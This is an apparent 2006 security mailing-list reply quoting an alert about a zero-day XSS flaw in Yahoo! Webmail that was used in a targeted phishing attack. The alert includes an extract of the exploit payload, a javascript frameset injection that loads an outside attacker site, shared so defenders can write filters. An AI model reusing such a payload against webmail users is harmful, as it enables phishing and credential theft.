RE: [Argeniss] Alert - Yahoo! Webmail XSS

["El Nahual" <nahual () g-con org>]

Whoa dudes are fast ...

Site is down now .. since it tries to connect to another IP =)

-----Mensaje original-----
De: Cesar [mailto:sqlsec () yahoo com] 
Enviado el: Lunes, 17 de Abril de 2006 02:15 p.m.
Para: dailydave () lists immunitysec com
Asunto: [Dailydave] [Argeniss] Alert - Yahoo! Webmail XSS

Hi.

I just got a targeted phishing attack to one of my
Yahoo email accounts,
what it´s insteresting it's that the attack exploits a
Yahoo! webmail
0day XSS vulnerability.
I'm contacting Yahoo right now but in the meantime I
thought it will be
good to provide some bits because the seriousness of
this .
When you browse a message on Yahoo! Webmail the XSS
exploit creates a
frameset and redirects to http://w00tynetwork.com/x/
,it's interesting
that the address bar at IE dosn´t refresh to show the
actual URL, you
can only see the redirection to
http://w00tynetwork.com/x/ on IE status
bar if you have it visible.
I don't know if this vulnerability is being exploited
on the wild since
it was a targeted attack.

Here is an extract from the exploit so you can start
build some
signatures, filtering, etc.
-----------------------------------
(java/**/script:document.write('<frameset cols=100%
rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

I will provide full details later when Yahoo! fix the
issue.
If security vendors are insterested on full details
plese ask for them
at info>at<argeniss>.<com

Cesar.

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com